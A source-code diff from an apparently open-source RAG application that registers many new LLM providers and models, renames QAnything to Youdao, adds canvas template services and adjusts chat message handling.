from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
|
||||
|
||||
def init_superuser():
|
||||
@ -120,11 +126,56 @@ factory_infos = [{
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "QAnything",
|
||||
"name": "Youdao",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},
|
||||
},{
|
||||
"name": "DeepSeek",
|
||||
"logo": "",
|
||||
"tags": "LLM",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "VolcEngine",
|
||||
"logo": "",
|
||||
"tags": "LLM, TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "BaiChuan",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Jina",
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING, TEXT RE-RANK",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "BAAI",
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING, TEXT RE-RANK",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "MiniMax",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Mistral",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Azure-OpenAI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Bedrock",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}
|
||||
# {
|
||||
# "name": "文心一言",
|
||||
# "logo": "",
|
||||
@ -138,6 +189,12 @@ def init_llm_factory():
|
||||
llm_infos = [
|
||||
# ---------------------- OpenAI ------------------------
|
||||
{
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-3.5-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
@ -155,6 +212,18 @@ def init_llm_factory():
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "whisper-1",
|
||||
@ -323,7 +392,7 @@ def init_llm_factory():
|
||||
"max_tokens": 2147483648,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ QAnything -----------------------
|
||||
# ------------------------ Youdao -----------------------
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-embedding-base_v1",
|
||||
@ -331,6 +400,505 @@ def init_llm_factory():
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-reranker-base_v1",
|
||||
"tags": "RE-RANK, 512",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
# ------------------------ DeepSeek -----------------------
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-chat",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-coder",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ VolcEngine -----------------------
|
||||
{
|
||||
"fid": factory_infos[9]["name"],
|
||||
"llm_name": "Skylark2-pro-32k",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[9]["name"],
|
||||
"llm_name": "Skylark2-pro-4k",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ BaiChuan -----------------------
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan2-Turbo",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan2-Turbo-192k",
|
||||
"tags": "LLM,CHAT,192K",
|
||||
"max_tokens": 196608,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan3-Turbo",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan3-Turbo-128k",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 131072,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan4",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 131072,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[10]["name"],
|
||||
"llm_name": "Baichuan-Text-Embedding",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ Jina -----------------------
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-reranker-v1-base-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-reranker-v1-turbo-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-reranker-v1-tiny-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-colbert-v1-en",
|
||||
"tags": "RE-RANK,8k",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-en",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-de",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-es",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-code",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[11]["name"],
|
||||
"llm_name": "jina-embeddings-v2-base-zh",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8196,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ BAAI -----------------------
|
||||
{
|
||||
"fid": factory_infos[12]["name"],
|
||||
"llm_name": "BAAI/bge-large-zh-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 1024,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[12]["name"],
|
||||
"llm_name": "BAAI/bge-reranker-v2-m3",
|
||||
"tags": "RE-RANK,2k",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
# ------------------------ Minimax -----------------------
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5s-chat",
|
||||
"tags": "LLM,CHAT,245k",
|
||||
"max_tokens": 245760,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5t-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5g-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab5.5-chat",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16384,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab5.5s-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ Mistral -----------------------
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mixtral-8x22b",
|
||||
"tags": "LLM,CHAT,64k",
|
||||
"max_tokens": 64000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mixtral-8x7b",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mistral-7b",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-large-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-small-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-medium-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "codestral-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-embed",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING
|
||||
},
|
||||
# ------------------------ Azure OpenAI -----------------------
|
||||
# Please ensure the llm_name is the same as the name in Azure
|
||||
# OpenAI deployment name (e.g., azure-gpt-4o). And the llm_name
|
||||
# must different from the OpenAI llm_name
|
||||
#
|
||||
# Each model must be deployed in the Azure OpenAI service, otherwise,
|
||||
# you will receive an error message 'The API deployment for
|
||||
# this resource does not exist'
|
||||
{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-35-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-35-turbo-16k",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-ada-002",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-whisper-1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-32k",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-vision-preview",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ------------------------ Bedrock -----------------------
|
||||
{
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "ai21.j2-ultra-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "ai21.j2-mid-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-text-v14",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-light-text-v14",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-r-v1:0",
|
||||
"tags": "LLM,CHAT,128k",
|
||||
"max_tokens": 128 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-r-plus-v1:0",
|
||||
"tags": "LLM,CHAT,128k",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-v2",
|
||||
"tags": "LLM,CHAT,100k",
|
||||
"max_tokens": 100 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-v2:1",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-sonnet-20240229-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-5-sonnet-20240620-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-haiku-20240307-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-opus-20240229-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-instant-v1",
|
||||
"tags": "LLM,CHAT,100k",
|
||||
"max_tokens": 100 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-express-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-premier-v1:0",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-lite-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama2-13b-chat-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama2-70b-chat-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama3-8b-instruct-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama3-70b-instruct-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-7b-instruct-v0:2",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mixtral-8x7b-instruct-v0:1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-large-2402-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-small-2402-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-embed-text-v2:0",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.embed-english-v3",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.embed-multilingual-v3",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
]
|
||||
for info in factory_infos:
|
||||
try:
|
||||
@ -347,7 +915,28 @@ def init_llm_factory():
|
||||
LLMService.filter_delete([LLM.fid == "Local"])
|
||||
LLMService.filter_delete([LLM.fid == "Moonshot", LLM.llm_name == "flag-embedding"])
|
||||
TenantLLMService.filter_delete([TenantLLM.llm_factory == "Moonshot", TenantLLM.llm_name == "flag-embedding"])
|
||||
|
||||
LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
|
||||
LLMService.filter_delete([LLMService.model.fid == "QAnything"])
|
||||
TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
|
||||
## insert openai two embedding models to the current openai user.
|
||||
print("Start to insert 2 OpenAI embedding models...")
|
||||
tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
|
||||
for tid in tenant_ids:
|
||||
for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
|
||||
row = row.to_dict()
|
||||
row["model_type"] = LLMType.EMBEDDING.value
|
||||
row["llm_name"] = "text-embedding-3-small"
|
||||
row["used_tokens"] = 0
|
||||
try:
|
||||
TenantLLMService.save(**row)
|
||||
row = deepcopy(row)
|
||||
row["llm_name"] = "text-embedding-3-large"
|
||||
TenantLLMService.save(**row)
|
||||
except Exception as e:
|
||||
pass
|
||||
break
|
||||
for kb_id in KnowledgebaseService.get_all_ids():
|
||||
KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
|
||||
"""
|
||||
drop table llm;
|
||||
drop table llm_factories;
|
||||
@ -358,6 +947,20 @@ def init_llm_factory():
|
||||
"""
|
||||
|
||||
|
||||
def add_graph_templates():
|
||||
dir = os.path.join(get_project_base_directory(), "graph", "templates")
|
||||
for fnm in os.listdir(dir):
|
||||
try:
|
||||
cnvs = json.load(open(os.path.join(dir, fnm), "r"))
|
||||
try:
|
||||
CanvasTemplateService.save(**cnvs)
|
||||
except:
|
||||
CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
|
||||
except Exception as e:
|
||||
print("Add graph templates error: ", e)
|
||||
print("------------", flush=True)
|
||||
|
||||
|
||||
def init_web_data():
|
||||
start_time = time.time()
|
||||
|
||||
@ -365,6 +968,7 @@ def init_web_data():
|
||||
if not UserService.get_all().count():
|
||||
init_superuser()
|
||||
|
||||
add_graph_templates()
|
||||
print("init web data success:{}".format(time.time() - start_time))
|
||||
|
||||
|
||||
|
||||
@ -40,8 +40,8 @@ class API4ConversationService(CommonService):
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def append_message(cls, id, conversation):
|
||||
cls.model.update_by_id(id, conversation)
|
||||
return cls.model.update(round=cls.model.round + 1).where(id=id).execute()
|
||||
cls.update_by_id(id, conversation)
|
||||
return cls.model.update(round=cls.model.round + 1).where(cls.model.id==id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
|
||||
26
api/db/services/canvas_service.py
Normal file
26
api/db/services/canvas_service.py
Normal file
@ -0,0 +1,26 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
import peewee
|
||||
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
|
||||
from api.db.services.common_service import CommonService
|
||||
|
||||
|
||||
class CanvasTemplateService(CommonService):
|
||||
model = CanvasTemplate
|
||||
|
||||
class UserCanvasService(CommonService):
|
||||
model = UserCanvas
|
||||
@ -14,6 +14,7 @@
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.db_models import Dialog, Conversation
|
||||
@ -22,6 +23,7 @@ from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
|
||||
from api.settings import chat_logger, retrievaler
|
||||
from rag.app.resume import forbidden_select_fields4resume
|
||||
from rag.nlp import keyword_extraction
|
||||
from rag.nlp.search import index_name
|
||||
from rag.utils import rmSpace, num_tokens_from_string, encoder
|
||||
|
||||
@ -57,21 +59,21 @@ def message_fit_in(msg, max_length=4000):
|
||||
if c < max_length:
|
||||
return c, msg
|
||||
|
||||
ll = num_tokens_from_string(msg_[0].content)
|
||||
l = num_tokens_from_string(msg_[-1].content)
|
||||
ll = num_tokens_from_string(msg_[0]["content"])
|
||||
l = num_tokens_from_string(msg_[-1]["content"])
|
||||
if ll / (ll + l) > 0.8:
|
||||
m = msg_[0].content
|
||||
m = msg_[0]["content"]
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[0].content = m
|
||||
msg[0]["content"] = m
|
||||
return max_length, msg
|
||||
|
||||
m = msg_[1].content
|
||||
m = msg_[1]["content"]
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[1].content = m
|
||||
msg[1]["content"] = m
|
||||
return max_length, msg
|
||||
|
||||
|
||||
def chat(dialog, messages, **kwargs):
|
||||
def chat(dialog, messages, stream=True, **kwargs):
|
||||
assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
|
||||
llm = LLMService.query(llm_name=dialog.llm_id)
|
||||
if not llm:
|
||||
@ -79,10 +81,13 @@ def chat(dialog, messages, **kwargs):
|
||||
if not llm:
|
||||
raise LookupError("LLM(%s) not found" % dialog.llm_id)
|
||||
max_tokens = 1024
|
||||
else: max_tokens = llm[0].max_tokens
|
||||
else:
|
||||
max_tokens = llm[0].max_tokens
|
||||
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
|
||||
if len(embd_nms) != 1:
|
||||
yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
|
||||
questions = [m["content"] for m in messages if m["role"] == "user"]
|
||||
embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
@ -94,7 +99,9 @@ def chat(dialog, messages, **kwargs):
|
||||
if field_map:
|
||||
